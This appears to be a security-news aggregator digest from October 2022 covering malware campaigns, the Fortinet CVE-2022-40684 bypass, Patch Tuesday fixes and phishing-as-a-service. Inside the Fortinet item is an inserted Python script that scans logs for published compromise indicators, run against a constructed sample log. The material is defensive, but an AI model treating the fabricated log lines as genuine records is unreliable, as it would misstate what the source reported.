Skybox Security announced the next generation of its Security Posture Management Platform, including a Software-as-a-Service (SaaS) solution for Security Policy and Vulnerability Management. Propelling its global customer base into the next era of proactive cybersecurity, major innovations advance its platform that continuously tests attack feasibility, exposure, remediation options, and compliance across hybrid environments. "Today, we're delivering on our mission of building the world's leading Security Posture Management platform," said Skybox Security CEO and Founder …

Autosummary: "Executives and board members want to know if their cybersecurity teams are staying ahead of the latest celebrity malware such as TrickBot, REMCOS, FormBook, AZORult, Ursnif, Agent Tesla, and NanoCore," said Ran Abramson, Threat Intelligence Analyst, Skybox Research Lab. Building on its Exposure Management process that emphasizes publicly known vulnerabilities and identifies control gaps, Skybox now also associates vulnerabilities to malware by name, category, and distinct classes, including ransomware, Remote Access Trojans (RATs), botnets, cryptocurrency miners, trojans, and more. Expansion into Cyber Asset Attack Surface Management: challenging the status quo through a dynamic, fresh approach to Cyber Asset Attack Surface Management (CAASM), Skybox visualizes all assets through API integrations, identifies and prioritizes vulnerabilities using proprietary threat intelligence, sees gaps in security controls, and automatically provides remediation options. Manage security policies, prioritize vulnerabilities, and remediate exposures across the most complex on-premises, cloud, operational technology (OT), and hybrid environments.


                YoWhatsApp, unofficial WhatsApp Android app spreads the Triada Trojan

                exploits
                2022-10-13 https://securityaffairs.co/wordpress/137013/malware/yowhatsapp-fake-whatsapp.html

Kaspersky researchers warn of a recently discovered malicious version of a popular WhatsApp messenger mod dubbed YoWhatsApp. Kaspersky researchers discovered an unofficial WhatsApp Android application named 'YoWhatsApp' that steals access keys for users' accounts. Mod apps are advertised as unofficial versions of legitimate apps that have features the official one does not support. YoWhatsApp is […]

Autosummary: To stay safe, the researchers recommend: only installing applications from official stores and reliable resources; remembering to check which permissions you give installed applications, as some of them can be very dangerous; installing a reliable mobile antivirus on your smartphone, such as Kaspersky Internet Security for Android.


                Fear of cybercriminals drives cybersecurity improvements

                ciber
                2022-10-13 https://www.helpnetsecurity.com/2022/10/13/improving-cybersecurity-defenses-video/

Fortifying cybersecurity defenses remains a work in progress for many organizations, who acknowledge their shortcomings but have yet to commit the necessary resources to the effort, according to new research from CompTIA. This Help Net Security video uncovers how cybersecurity is becoming more tightly integrated with business objectives.


                Modified WhatsApp App Caught Infecting Android Devices with Malware

                exploits
                2022-10-13 https://thehackernews.com/2022/10/modified-whatsapp-app-caught-infecting.html
An unofficial version of the popular WhatsApp messaging app called YoWhatsApp has been observed deploying an Android trojan known as Triada. The goal of the malware is to steal the keys that "allow the use of a WhatsApp account without the app," Kaspersky said in a new report. "If the keys are stolen, a user of a malicious WhatsApp mod can lose control over their account."


                New Chinese Malware Attack Framework Targets Windows, macOS, and Linux Systems

                exploits
                2022-10-13 https://thehackernews.com/2022/10/new-chinese-malware-attack-framework.html
A previously undocumented command-and-control (C2) framework dubbed Alchimist is likely being used in the wild to target Windows, macOS, and Linux systems. "Alchimist C2 has a web interface written in Simplified Chinese and can generate a configured payload, establish remote sessions, deploy payload to the remote machines, capture screenshots, perform remote shellcode execution, and run


                Exploit available for critical Fortinet auth bypass bug, patch now

                exploits
                2022-10-13 https://www.bleepingcomputer.com/news/security/exploit-available-for-critical-fortinet-auth-bypass-bug-patch-now/
Proof-of-concept exploit code is now available for a critical authentication bypass vulnerability affecting Fortinet's FortiOS, FortiProxy, and FortiSwitchManager appliances. [...]

Autosummary: Those who want to verify whether their devices have already been compromised before applying mitigations or patches can check the devices' logs for user="Local_Process_Access", user_interface="Node.js", or user_interface="Report Runner".
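The three log indicators quoted above are enough for a first-pass triage script. What follows is an added example, not code from BleepingComputer, Fortinet or Horizon3.ai: it parses space-separated key="value" log lines, flags any line carrying one of the three field/value pairs the article names, and runs over a handful of constructed sample lines. Only those three pairs come from the article; the surrounding field layout of the sample lines is an assumption. Matching is exact and case-sensitive, and an empty result means only that these particular indicators were not found in the lines given, not that the device is clean, since an attacker who gained administrative access could also have altered or cleared the logs.

```python
"""Scan FortiOS-style key="value" log lines for the three compromise
indicators named in the article. Added example; not Fortinet's, Horizon3.ai's
or BleepingComputer's code. SAMPLE_LOG is constructed: its field layout is an
assumption, only the (field, value) pairs in INDICATORS come from the article."""
import re
from typing import Dict, Iterable, List

# (field, value) pairs quoted in the article. Values must match exactly.
INDICATORS = (
    ("user", "Local_Process_Access"),
    ("user_interface", "Node.js"),
    ("user_interface", "Report Runner"),
)

# key=value where the value is either double-quoted (may contain spaces) or bare.
_FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> Dict[str, str]:
    """Split one log line into a field dict; quoted and bare values both work."""
    fields: Dict[str, str] = {}
    for match in _FIELD.finditer(line):
        key, quoted, bare = match.groups()
        fields[key] = quoted if quoted is not None else bare
    return fields


def find_indicators(lines: Iterable[str]) -> List[dict]:
    """Return one hit per line that carries at least one indicator pair.

    Each hit records the 1-based line number, the matched field=value pairs
    (sorted, so output is stable) and the parsed fields for follow-up triage.
    """
    hits: List[dict] = []
    for number, line in enumerate(lines, start=1):
        fields = parse_line(line)
        matched = sorted(
            f"{field}={value}"
            for field, value in INDICATORS
            if fields.get(field) == value
        )
        if matched:
            hits.append({"line": number, "matched": matched, "fields": fields})
    return hits


# Constructed sample log: two benign admin events around two suspicious ones.
# Real FortiOS events carry more fields; only the indicator pairs are from the article.
SAMPLE_LOG = [
    'date=2022-10-13 time=08:01:12 type="event" subtype="system" '
    'logdesc="Admin login successful" user="admin" user_interface="https(10.0.0.5)" '
    'srcip=10.0.0.5 action="login" status="success"',
    'date=2022-10-13 time=08:14:37 type="event" subtype="system" '
    'logdesc="Object attribute configured" user="Local_Process_Access" '
    'user_interface="Node.js" action="Edit" cfgpath="system.admin" msg="Edit system.admin"',
    'date=2022-10-13 time=08:14:39 type="event" subtype="system" '
    'logdesc="Object attribute configured" user="Local_Process_Access" '
    'user_interface="Report Runner" action="Edit" cfgpath="system.admin"',
    'date=2022-10-13 time=08:30:02 type="event" subtype="system" '
    'logdesc="Admin logout" user="admin" user_interface="ssh(10.0.0.5)" action="logout"',
]


if __name__ == "__main__":
    for hit in find_indicators(SAMPLE_LOG):
        print(f"line {hit['line']}: {', '.join(hit['matched'])}")
```

To run it against a real export, replace SAMPLE_LOG with the file's lines (one event per line). Any hit is worth reading together with the other fields of the same event, in particular which configuration object the session touched, before deciding what else to restore or rotate.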


                Magniber ransomware now infects Windows users via JavaScript files

                exploits ransomware
                2022-10-13 https://www.bleepingcomputer.com/news/security/magniber-ransomware-now-infects-windows-users-via-javascript-files/
A recent malicious campaign delivering Magniber ransomware has been targeting Windows home users with fake security updates. [...]

Autosummary: For the recent one, it switched to JavaScript files that had the following names: SYSTEM.Critical.Upgrade.Win10.0.ba45bd8ee89b1.js, SYSTEM.Security.Database.Upgrade.Win10.0.jse, Antivirus_Upgrade_Cloud.29229c7696d2d84.jse, ALERT.System.Software.Upgrade.392fdad9ebab262cc97f832c40e6ad2c.js. These files are obfuscated and use a variation of the "DotNetToJScript" technique to execute a .NET file in the system memory, lowering the risk of detection by antivirus products available on the host.


                Introducing Malwarebytes Managed Detection and Response (MDR)

                exploits
                2022-10-13 https://www.malwarebytes.com/blog/business/2022/10/introducing-malwarebytes-managed-detection-and-response-mdr

With Malwarebytes MDR, our team of cybersecurity professionals acts as an extension to your security team.

Autosummary: The service ingests EDR (including Brute Force Protection) and Cloud Security Modules data together with threat intelligence feeds from multiple sources: premium external threat feeds; internal Malwarebytes feeds, including crowd-sourced intelligence from the entire Malwarebytes customer base (B2B and Consumer); and open-source feeds. Telemetry data and threat intelligence are correlated with the alert, which generates additional context for it (e.g., more clues to the behavior and origin). The MDR Analyst Team monitors endpoint alerts 24x7 to field incoming alerts: artifacts of the alert are rapidly reviewed and prioritized for triage; automations sift through the artifacts (processes, actions, etc.) to identify the most interesting; a case is opened on each artifact requiring triage; and a notification is provided to the customer within the MDR Portal. Each case is analyzed by the MDR Analyst team: deep analysis and review leveraging the enriched alerts, escalation to Tier 3 analysts and second opinions within the team, and a "best course of action" decided and communicated. MDR Analysts communicate one of two possible decisions via the customer portal: customer verification of the artifact is required, or remediation is required. The remediation options are then: Malwarebytes managed (Malwarebytes automatically provides remediation by removing threats using EDR capabilities; reboot, re-imaging, and other onsite tasks will require customer involvement); collaborative (Malwarebytes notifies the customer, who can authorize managed remediation or perform remediation themselves, or the two work together to take care of it outside of business hours, etc.); and manual (the customer does it, with guidance from Malwarebytes).


                For most companies ransomware is the scariest of all cyberattacks

                exploits ransomware ciber
                2022-10-12 https://www.helpnetsecurity.com/2022/10/12/customers-concerned-ransomware/

SonicWall released the 2022 SonicWall Threat Mindset Survey which found that 66% of customers are more concerned about cyberattacks in 2022, with the main threat being focused on financially motivated attacks like ransomware. "No one is safe from cyberattacks — businesses or individuals," said SonicWall Executive Chairman of the Board Bill Conner. "Today's business landscape requires persistent digital trust to exist. Supply-chain attacks have dramatically changed the attack surface of the typical enterprise in the …

Autosummary: Additional findings: rising concerns about escalating cyberattacks: there is growing concern regarding cyberattacks amongst 66% of organizations surveyed; ransomware leads the distress as 91% of all customers cited it as their biggest concern.


                How to improve employees’ cybersecurity behavior

                ciber
                2022-10-12 https://www.helpnetsecurity.com/2022/10/12/organizations-cybersecurity-behaviors-video/

We already have cybersecurity behaviors we learned from elsewhere, especially those who have grown up with technology. Initially, cybersecurity starts from home and school, and it is very hard nowadays to exist without some sort of online presence. When it comes to cybersecurity within organizations, employees tend to prioritize and focus on productivity rather than security. It is important to act on cybersecurity vulnerabilities within the IT system, but organizations should also strengthen the defenses …


                Are your cybersecurity investments making you less resilient?

                ciber
                2022-10-12 https://www.helpnetsecurity.com/2022/10/12/being-cyber-resilient/

In the past decade, digital transformation has become a buzzword in nearly every industry. Organizations have scaled down workforces in favor of automation, moved their servers and networks off-premises, and transferred their data to the cloud, but mostly kept to their old ways when thinking about cybersecurity. But things are finally changing, and the idea of cyber resilience is taking hold as an extension (or enhancement) of traditional business continuity (BC) and disaster recovery (DR) …

Autosummary: You've spent years securing your use of, and access to, SaaS providers with things like SSO, MFA, only allowing access from allowed IPs, etc. But even so, in the case of big companies, rebuilding machines, infrastructure, customer environments, and more takes time and money. When everything is running smoothly, of course, everything seems "critical" to the business, but when faced with a major security event that requires rebuilding, you simply can't get everything back at the same time.


                LockBit affiliates compromise Microsoft Exchange servers to deploy ransomware

                exploits ransomware
                2022-10-12 https://securityaffairs.co/wordpress/136968/cyber-crime/microsoft-exchange-lockbit-ransomware.html

                Lockbit ransomware affiliates are compromising Microsoft Exchange servers to deploy their ransomware, experts warn. South Korean cybersecurity firm AhnLab reported that Lockbit ransomware affiliates are distributing their malware via compromised Microsoft Exchange servers. In July 2022, two servers operated by a customer of the security firm were infected with LockBit 3.0 ransomware. Threat actors initially deployed […]

                The post LockBit affiliates compromise Microsoft Exchange servers to deploy ransomware appeared first on Security Affairs.

                "

                Autosummary: So far I’ve only skimmed a translated version of the page, but what evidence is provided that it’s a different vulnerability? — Will Dormann (@wdormann) October 11, 2022. Bleeping Computer pointed out that at least three vulnerabilities in Microsoft Exchange, discovered by Zero Day Initiative vulnerability researcher Piotr Bazydlo, have yet to be patched.


                64,000 Additional Patients Impacted by Omnicell Data Breach - What is Your Data Breach Action Plan?

                financial
                2022-10-12 https://thehackernews.com/2022/10/64000-additional-patients-impacted-by.html
                In April 2022, Omnicell reported a data breach affecting nearly 62,000 patients. The company has revealed that the incident has impacted an additional 64,000 individuals. This brings the total number of patients affected to over 126,000. Will you be the next victim like Omnicell? If you are overlooking the importance of data protection, attackers can get you in no time. Explore the impact of

                Autosummary: The types of information that may be exposed include credit card information, financial information, Social Security numbers, driver’s license numbers, and health insurance details. Healthcare industry is the prime target of cyberattacks: the Omnicell data breach was not the only cyber-attack targeting healthcare institutions. Omnicell announced data breach: founded in 1992, Omnicell is a leading provider of medication management solutions for hospitals, long-term care facilities, and retail pharmacies.


                Critical Bug in Siemens SIMATIC PLCs Could Let Attackers Steal Cryptographic Keys

                exploits industry
                2022-10-12 https://thehackernews.com/2022/10/critical-bug-in-siemens-simatic-plcs.html
                A vulnerability in Siemens Simatic programmable logic controller (PLC) can be exploited to retrieve the hard-coded, global private cryptographic keys and seize control of the devices. "An attacker can use these keys to perform multiple advanced attacks against Siemens SIMATIC devices and the related TIA Portal, while bypassing all four of its access level protections," industrial cybersecurity

                Autosummary: "


                Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs

                exploits
                2022-10-12 https://thehackernews.com/2022/10/microsoft-patch-tuesday-fixes-new.html
                Microsoft"s Patch Tuesday update for the month of October has addressed a total of 85 security vulnerabilities, including fixes for an actively exploited zero-day flaw in the wild. Of the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the actively exploited ProxyNotShell flaws in Exchange Server "

                Autosummary: Three other elevation of privilege vulnerabilities of note relate to Windows Hyper-V (CVE-2022-37979, CVSS score: 7.8), Active Directory Certificate Services (CVE-2022-37976, CVSS score: 8.8), and Azure Arc-enabled Kubernetes cluster Connect (CVE-2022-37968, CVSS score: 10.0).


                Google Forms abused in new COVID-19 phishing wave in the U.S.

                financial
                2022-10-12 https://www.bleepingcomputer.com/news/security/google-forms-abused-in-new-covid-19-phishing-wave-in-the-us/
                COVID-19-themed phishing messages are once again spiking in the U.S. following a prolonged summer hiatus that appears to be over. [...]

                Autosummary: (Figure: first page of the phishing form, INKY.) This includes their Google account credentials, SSNs, EINs, State ID and driver’s license details, and bank account number.


                Patch your iPhone now against mystery Mail crash bug

                exploits
                2022-10-12 https://grahamcluley.com/patch-your-iphone-now-against-mystery-mail-crash-bug/
                iOS 16.0.3 has been pushed out by Apple, and my advice is that you should install it.

                Autosummary: "


                Hackers Using Vishing to Trick Victims into Installing Android Banking Malware

                financial exploits
                2022-10-12 https://thehackernews.com/2022/10/hackers-using-vishing-tactics-to-trick.html
                Malicious actors are resorting to voice phishing (vishing) tactics to dupe victims into installing Android malware on their devices, new research from ThreatFabric reveals. The Dutch mobile security company said it identified a network of phishing websites targeting Italian online-banking users that are designed to get hold of their contact details. Telephone-oriented attack delivery (TOAD), as

                Autosummary: The caller, who purports to be a support agent for the bank, instructs the individual, on the other hand, to install a security app and grant it extensive permissions, when, in reality, it’s malicious software intended to gain remote access or conduct financial fraud.


                How scammers target Zelle users – and how you can stay safe

                financial
                2022-10-12 https://www.welivesecurity.com/2022/10/12/how-scammers-target-zelle-users-stay-safe/

                Fraudsters use various tactics to separate people from their hard-earned cash on Zelle. Here’s how to keep your money safe while using the popular P2P payment service.

                The post How scammers target Zelle users – and how you can stay safe appeared first on WeLiveSecurity

                "

                Autosummary: A new breed of apps, including Venmo, Cash App and Zelle, now offer a fast, effective and free way for users to pay friends, family and selected small businesses. Enhance authentication: If it’s not already enabled, add two-factor authentication to your banking or Zelle app, which will mean that even if scammers get hold of passwords and usernames, they won’t be able to hijack the account. Indeed, just days ago, Zelle came under fire in a US Senate report, which stated that Zelle users lost some $440 million through fraudulent transactions in 2021. Or they may pretend to be a representative from a government agency, bank, utility or similar, demanding funds to cover a late payment or fine. Consider the following: Be skeptical: Never send money to anyone you don’t trust, and remember that if an offer seems too good to be true, it usually is.


                Smashing Security podcast #293: Massive crypto bungle, and the slave scammers

                financial
                2022-10-12 https://grahamcluley.com/smashing-security-podcast-293/
                A couple unexpectedly find $10.5 million in their cryptocurrency account, and in Cambodia people are being forced to commit scams. All this and more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault.

                Autosummary: "


                Stairwell raises $45 million to secure organizations against emerging malware threats

                exploits
                2022-10-12 https://www.helpnetsecurity.com/2022/10/13/stairwell-funding/

                Stairwell announced a $45M Series B capitalization. The funding round was led by Section 32, with additional investments from Sequoia Capital, Accel, Lux Capital, Gradient Ventures, and angel investors Eric Schmidt and Michael Ovitz. This brings Stairwell’s total funding to date to $69.5 million as it looks to scale its flagship product, Inception, to become continuous intelligence, detection, and response solution available. “New vulnerabilities are discovered daily, and continuous monitoring, threat hunting, and response are … More

                The post Stairwell raises $45 million to secure organizations against emerging malware threats appeared first on Help Net Security.

                "

                Autosummary: “The power and advanced capabilities of the Inception platform are clear to customers and partners, and it’s rare to find a company with such a strong combination of product, engineering, customer focus, and executive leadership,” Harrison continued.


                UK government sounds alarm on tax scams

                financial government
                2022-10-12 https://www.malwarebytes.com/blog/news/2022/10/ukgov-sounds-alarm-on-hmrc-tax-scams

                Categories: News

                Tags: HMRC, UKGOV, tax, return, phish, fake, scam, refund, rebate

                Be on your guard for scammers offering fake rebates


                The post UK government sounds alarm on tax scams appeared first on Malwarebytes Labs.

                "

                Autosummary: The department responsible for tax in the UK, known as HMRC, has this to say: In the 12 months to August 2022, HMRC responded to more than 180,000 referrals of suspicious contact from the public, of which almost 81,000 were scams offering fake tax rebates. During tax season, a wave of bogus emails, texts, and even phone calls can find their way into your workspace as you arrange your receipts and spreadsheets.


                Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected

                exploits
                2022-10-12 https://www.malwarebytes.com/blog/news/2022/10/update-now-october-patch-tuesday-fixes-actively-used-zero-day

                Categories: Exploits and vulnerabilities, News

                Tags: Microsoft, Apple, Google, Android, Samsung, Xiaomi, Adobe, SAP, VMWare, Fortinet, CVE-2022-41033, CVE-2022-41040, zero-day

                No fix for ProxyNotShell


                The post Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected appeared first on Malwarebytes Labs.

                "

                Autosummary: What wasn’t fixed: The Exchange Server "ProxyNotShell" vulnerabilities, CVE-2022-41040 and CVE-2022-41082, were not fixed in this round of updates.


                Top 5 ransomware detection techniques: Pros and cons of each

                exploits ransomware
                2022-10-12 https://www.malwarebytes.com/blog/business/2022/10/top-5-ransomware-detection-techniques-pros-and-cons-of-each

                Categories: Business

                Detecting ransomware can be tricky. Attackers use obfuscation and evasion techniques to avoid detection, and new ransomware variants are produced every day. In this post, we look at five ransomware detection techniques and their pros and cons.


                The post Top 5 ransomware detection techniques: Pros and cons of each appeared first on Malwarebytes Labs.

                "

                Autosummary: Pros: Can detect ransomware that static engines do not catch; fewer false positives than previously mentioned dynamic techniques. Cons: High CPU utilization on the endpoint; files will be encrypted until a level of confidence is reached, so not all damage is blocked; bypass by encrypting only part of the file, or by encrypting in chunks.
                Pros: Low false positive rate; effective against common ransomware; no damage is done. Cons: Trivial to bypass; ransomware with a new extension will manage to encrypt; it can be difficult to find a file-monitoring solution that has an extension blacklist feature.
                Pros: Low false positive rate; effective against known ransomware; can stop attacks before execution, so no files are encrypted. Cons: Time consuming if conducted manually; can be bypassed easily using packers/crypters or by simply replacing characters with digits or special characters.
                Cons: Some false positives, as programs and users may touch the bait files; files will be encrypted until ransomware touches the decoy files; bypass by skipping hidden files/folders, or by targeting specific folders.


                How government organizations can stay steps ahead of attackers

                government
                2022-10-11 https://www.helpnetsecurity.com/2022/10/11/how-government-organizations-can-stay-steps-ahead-of-attackers-video/

                Attacks against governments are nothing new. They have been an interesting target since they have existed, for the mere reason that not everyone agrees on how things are run. In this Help Net Security video, David Masson, Director of Enterprise Security at Darktrace, illustrates how the attack surface is getting bigger by the day. Due to the enormous quantity of data government organizations need to protect, the challenges faced by their security teams are significant. … More

                The post How government organizations can stay steps ahead of attackers appeared first on Help Net Security.

                "

                Autosummary: "


                Cybercriminals are having it easy with phishing-as-a-service

                financial ciber
                2022-10-11 https://www.helpnetsecurity.com/2022/10/11/paas-risks/

                In this interview for Help Net Security, Immanuel Chavoya, Threat Detection Expert at SonicWall, talks about phishing-as-a-service (PaaS), the risks it can pose to organizations, and what to do to tackle this threat. Phishing-as-a-service has become a growing threat to organizations. How exactly does this trend work? Phishing attacks have only grown with the rise of SaaS in the workplace, and even the most security-savvy worker can be duped into a phishing attack. Phishing-as-a-service is … More

                The post Cybercriminals are having it easy with phishing-as-a-service appeared first on Help Net Security.

                "

                Autosummary: In this interview for Help Net Security, Immanuel Chavoya, Threat Detection Expert at SonicWall, talks about phishing-as-a-service (PaaS), the risks it can pose to organizations, and what to do to tackle this threat. Instead of threat actors being required to have technical knowledge of building or taking over infrastructure to host a phishing kit (a login page emulating known login interfaces like Facebook/Amazon/Netflix/OWA), the barrier to entry is significantly lowered with the introduction of PaaS. Last year, a large-scale SaaS campaign, marketed by criminals as BulletProofLink, was exposed by Microsoft, finding more than 300,000 newly created and unique subdomains.


                Fortinet Warns of Active Exploitation of Newly Discovered Critical Auth Bypass Bug

                exploits
                2022-10-11 https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html
                Fortinet on Monday revealed that the newly patched critical security vulnerability impacting its firewall and proxy products is being actively exploited in the wild. Tracked as CVE-2022-40684 (CVSS score: 9.6), the flaw relates to an authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager that could allow a remote attacker to perform unauthorized operations on the administrative

                Autosummary: "


                DeepFakes Are The Cybercriminal Economy’s Latest Business Line

                ciber
                2022-10-11 https://securityaffairs.co/wordpress/136927/cyber-crime/deepfakes-services-cybercrime.html

                California-based Resecurity has identified a new spike of underground services enabling bad actors to generate deepfakes. According to cybersecurity experts, this may be used for political propaganda, foreign influence activity, disinformation, scams, and fraud.  Introduced by Canadian researchers to the public in 2014, Generative Adversarial Networks (GANs), typically imitate people’s faces, speech, and unique facial […]

                The post DeepFakes Are The Cybercriminal Economy’s Latest Business Line appeared first on Security Affairs.

                "

                Autosummary: "


                Hacking group POLONIUM uses ‘Creepy’ malware against Israel

                exploits
                2022-10-11 https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/
                Security researchers reveal previously unknown malware used by the cyber espionage hacking group "POLONIUM," threat actors who appear to target Israeli organizations exclusively. [...]

                Autosummary: Since September 2021, the hackers have used at least seven variants of custom backdoors, including four new undocumented backdoors known as "TechnoCreep", "FlipCreep", "MegaCreep", and "PapaCreep."


                Auth bypass bug in FortiOS, FortiProxy is exploited in the wild (CVE-2022-40684)

                exploits
                2022-10-11 https://www.helpnetsecurity.com/2022/10/11/cve-2022-40684-exploited/

                After privately warning customers last week that they need to patch or mitigate CVE-2022-40684, a critical vulnerability affecting FortiOS, FortiProxy, and FortiSwitchManager, Fortinet has finally confirmed that it “is aware of an instance where this vulnerability was exploited.” But their advice to organizations to immediately check their systems for a specific indicator of compromise makes it sound like they believe more widespread attacks have happened or are happening. About CVE-2022-40684 CVE-2022-40684 is an authentication bypass … More

                The post Auth bypass bug in FortiOS, FortiProxy is exploited in the wild (CVE-2022-40684) appeared first on Help Net Security.

                "

                Autosummary: "


                Researchers Warn of New Phishing-as-a-Service Being Used by Cyber Criminals

                financial
                2022-10-11 https://thehackernews.com/2022/10/researchers-warn-of-new-phishing-as.html
                Cyber criminals are using a previously undocumented phishing-as-a-service (PhaaS) toolkit called Caffeine to effectively scale up their attacks and distribute nefarious payloads. "This platform has an intuitive interface and comes at a relatively low cost while providing a multitude of features and tools to its criminal clients to orchestrate and automate core elements of their phishing

                Autosummary: It requires users to create an account and buy a subscription that costs $250 a month (Basic), $450 for three months (Professional), or $850 for a six-month license (Enterprise) to access its wide range of services, including the campaign management dashboard and the tools to configure the attacks.


                VMware vCenter Server bug disclosed last year still not patched

                exploits
                2022-10-11 https://www.bleepingcomputer.com/news/security/vmware-vcenter-server-bug-disclosed-last-year-still-not-patched/
                VMware informed customers today that vCenter Server 8.0 (the latest version) is still waiting for a patch to address a high-severity privilege escalation vulnerability disclosed in November 2021. [...]

                Autosummary: "


                Windows 11 KB5018427 update released with 30 bug fixes, improvements

                exploits
                2022-10-11 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5018427-update-released-with-30-bug-fixes-improvements/
                Microsoft has released the Windows 11 22H2 KB5018427 cumulative update with security updates and improvements, including USB printing and Bluetooth headsets fixes. [...]

                Autosummary: Windows 11 KB5018427 cumulative update: Windows 11 users can install today’s update by going to Start > Settings > Windows Update and clicking on "Check for Updates."


                Microsoft October 2022 Patch Tuesday fixes zero-day used in attacks, 84 flaws

                exploits
                2022-10-11 https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2022-patch-tuesday-fixes-zero-day-used-in-attacks-84-flaws/
                Today is Microsoft"s October 2022 Patch Tuesday, and with it comes fixes for an actively exploited Windows vulnerability and a total of 84 flaws. [...] "

                Autosummary: The number of bugs in each vulnerability category is listed below:
                39 Elevation of Privilege Vulnerabilities
                2 Security Feature Bypass Vulnerabilities
                20 Remote Code Execution Vulnerabilities
                11 Information Disclosure Vulnerabilities
                8 Denial of Service Vulnerabilities
                4 Spoofing Vulnerabilities
                The above counts do not include twelve vulnerabilities fixed in Microsoft Edge on October 3rd.


                Microsoft Exchange servers hacked to deploy LockBit ransomware

                exploits ransomware
                2022-10-11 https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-lockbit-ransomware/
                Lockbit ransomware affiliates are encrypting victims via Microsoft Exchange servers hacked using exploits targeting unpatched vulnerabilities. [...]

                Autosummary: "There is a possibility that the vulnerabilities of Microsoft Exchange Server (CVE-2022-41040, CVE-2022-41082) disclosed by GTSC, a Vietnamese security company, on September 28 were used, but the attack method, the generated WebShell file name, and subsequent attacks after WebShell creation," AhnLab says. "


                Microsoft patches Windows flaw exploited in the wild (CVE-2022-41033)

                exploits
                2022-10-11 https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/

                October 2022 Patch Tuesday is here, with fixes for 85 CVE-numbered vulnerabilities, including CVE-2022-41033, a vulnerability in Windows COM+ Event System Service that has been found being exploited in the wild. But, first and foremost, it should be noted that the two MS Exchange zero-days under active exploitation (CVE-2022-41040 and CVE-2022-41082, aka ProxyNotShell) have still not been patched, and administrators must make do with Microsoft’s guidance on how to mitigate them until the fixes are … More

                The post Microsoft patches Windows flaw exploited in the wild (CVE-2022-41033) appeared first on Help Net Security.

                "

                Autosummary: But, first and foremost, it should be noted that the two MS Exchange zero-days under active exploitation (CVE-2022-41040 and CVE-2022-41082, aka ProxyNotShell) have still not been patched, and administrators must make do with Microsoft’s guidance on how to mitigate them until the fixes are ready.


                BazarCall Callback Phishing Attacks Constantly Evolving Its Social Engineering Tactics

                financial industry
                2022-10-11 https://thehackernews.com/2022/10/bazarcall-callback-phishing-attacks.html
                The operators behind the BazaCall call back phishing method have continued to evolve with updated social engineering tactics to deploy malware on targeted networks. The scheme eventually acts as an entry point to conduct financial fraud or the delivery of next-stage payloads such as ransomware, cybersecurity company Trellix said in a report published last week. Primary targets of the latest

                Autosummary: "


                Caffeine, a new Phishing-as-a-Service toolkit available in the underground

                financial
                2022-10-11 https://securityaffairs.co/wordpress/136953/cyber-crime/caffeine-phishing-platform.html

                Researchers warn of a new phishing-as-a-service (PhaaS) toolkit, called Caffeine, which is being used by cybercriminals. In March 2022, Mandiant researchers discovered threat actors using a shared Phishing-as-a-Service (PhaaS) platform called Caffeine. The experts noticed that the toolkit has an intuitive interface and supports multiple features that allow customers to easily arrange phishing campaigns. The service […]

                The post Caffeine, a new Phishing-as-a-Service toolkit available in the underground appeared first on Security Affairs.

                "

                Autosummary: The report published by Mandiant provides details about the main elements of the Caffeine Phishing Platform, which are: core Caffeine account; licensing; campaign infrastructure and configuration. “It is also important to keep in mind that defensive measures against PhaaS attacks can be a game of cat and mouse.


                Resistant AI and ComplyAdvantage launch AI-driven solution to combat financial crime

                financial
                2022-10-11 https://www.helpnetsecurity.com/2022/10/12/resistant-ai-complyadvantage/

                Resistant AI and ComplyAdvantage launched their solution for fighting financial crime across the U.S. and Europe. Financial crime is a multi-trillion-dollar problem. According to the United Nations, the estimated amount of money laundered globally in one year is 2 – 5% of global GDP, or 800 billion – 2 trillion US dollars. While the cost of fraud and money laundering to financial organizations and other businesses is significant, the cost and damage to economies and … More

                The post Resistant AI and ComplyAdvantage launch AI-driven solution to combat financial crime appeared first on Help Net Security.

                "

                Autosummary: Adding Resistant AI’s capabilities to ComplyAdvantage’s transaction risk monitoring platform extends anti-money laundering (AML) and anti-fraud protections offered to financial institutions and other businesses by enabling them to detect previously unknown patterns of behavior and identify new risks faster.


                Cyware hires three industry experts to increase its marketing programs

                industry
                2022-10-11 https://www.helpnetsecurity.com/2022/10/12/cyware-marketing-leadership-team/

                Cyware has appointed Willy Leichter as Vice President of Marketing, Jeff Bell as Director of Demand Generation, and Mark Bermingham as Director of Product Marketing. In their new roles, Willy, Jeff, and Mark will expand the company’s marketing capabilities. In its quest to solve the automation, threat intelligence, and security collaboration challenges for security teams globally, Willy, Jeff, and Mark will help Cyware to grow its reach and generate demand by increasing its marketing programs. … More

                The post Cyware hires three industry experts to increase its marketing programs appeared first on Help Net Security.

                "

                Autosummary: Serving numerous large Enterprises, MSSPs, and ISACs across the globe, Cyware is poised to lead the creation of next-gen security infrastructure through its diverse all-star team, extensive partner ecosystem, loyal clientele, and industry-leading products.


                An 18 year scam odyssey of stranded astronauts

                financial
                2022-10-11 https://www.malwarebytes.com/blog/news/2022/10/an-18-year-scam-odyssey-of-stranded-astronauts

                Categories: News

                Tags: scam, fake, fraud, phish, romance, 419, astronaut, space, station, shuttle, rocket, email

                We take a look at a scam which has come around every couple of years and which has finally claimed a sizable bounty from a victim.


                The post An 18 year scam odyssey of stranded astronauts appeared first on Malwarebytes Labs.

                "

                Autosummary: Instead of flood, famine, and the death of Kings, it brings confusion, some level of hilarity, and a slice of sheer disbelief. This is because he claimed his cousin, Abacha Tunde, was stranded on a secret Soviet military space station via the Soyuz, which would typically be one of its flights to and from the International Space Station. It’s now 2010, and Dr. Bakare Tunde is still asking for help to get his cousin, Abacha Tunde, returned to Earth.


                Security awareness campaign highlights things your bank will never say

                financial
                2022-10-11 https://www.malwarebytes.com/blog/news/2022/10/security-awareness-campaign-highlights-things-your-bank-will-never-say

                Categories: News

